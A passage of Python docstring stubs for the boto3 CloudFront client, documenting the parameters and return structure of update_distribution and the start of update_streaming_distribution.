origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) -- Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements. Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution. Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items . (dict) --A complex type that describes how CloudFront processes requests. You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used. For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference . If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error. To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element. To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution. For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide . PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution. Note You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / . The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior. For more information, see Path Pattern in the Amazon CloudFront Developer Guide . TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CustomErrorResponses (dict) --A complex type that controls the following: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items . Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration. (dict) --A complex type that controls: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration. ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true: The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* . The value of TargetOriginId specifies the value of the ID element for the origin that contains your custom error pages. If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document. We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable. ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example: Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted. If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors. You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down. If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document. ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available. If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document. For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Comment (string) -- [REQUIRED]Any comments you want to include about the distribution. If you don't want to specify a comment, include an empty Comment element. To delete an existing comment, update the distribution configuration and include an empty Comment element. To add or change a comment, update the distribution configuration and specify the new comment. Logging (dict) --A complex type that controls whether access logs are written for the distribution. For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted. IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies . Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations. If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance. For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing . Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. ViewerCertificate (dict) --A complex type that specifies the following: Which SSL/TLS certificate to use when viewers request objects using HTTPS Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names The minimum protocol version that you want CloudFront to use when communicating with viewers For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide . CloudFrontDefaultCertificate (boolean) -- IAMCertificateId (string) -- ACMCertificateArn (string) -- SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients: vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges. sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following: Use the vip option (dedicated IP addresses) instead of sni-only . Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png . If you can control which browser your users use, upgrade the browser to one that supports SNI. Use HTTP instead of HTTPS. Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate . For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following: If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed. If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion . Certificate (string) --Include one of these values to specify the following: Whether you want viewers to use HTTP or HTTPS to request your objects. If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net . If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store. You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate . If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors. If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name: If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority: ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution. IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store. If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod . If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod : vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate. sni-only : CloudFront drops the connection with the browser without returning the object. **If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors: ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins: OriginProtocolPolicyhttps-onlyOriginProtocolPolicy OriginProtocolPolicymatch-viewerOriginProtocolPolicy For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . CertificateSource (string) -- Note This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] . Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content. GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases. RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country: none : No geo restriction is enabled, meaning access to content is not restricted by client geo location. blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content. whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content. Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items . Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ). The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country. CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes. (string) -- WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution. AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide . HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version. For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI). In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.' IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution. In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide . If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true: You enable IPv6 for the distribution You're using alternate domain names in the URLs for your objects For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide . If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request. :type Id: string :param Id: [REQUIRED] The distribution's id. :type IfMatch: string :param IfMatch: The value of the ETag header that you received when retrieving the distribution's configuration. For example: E2QWRUHAPOMQZL . :rtype: dict :return: { 'Distribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'InProgressInvalidationBatches': 123, 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False } }, 'ETag': 'string' } :returns: self , which is the AWS account used to create the distribution. An AWS account number. """ pass def update_streaming_distribution(StreamingDistributionConfig=None, Id=None, IfMatch=None): """ Update a streaming distribution. See also: AWS API Documentation :example: response = client.update_streaming_distribution( StreamingDistributionConfig={ 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False }, Id='string', IfMatch='string' ) :type StreamingDistributionConfig: dict :param StreamingDistributionConfig: [REQUIRED] The streaming distribution's configuration information. CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original 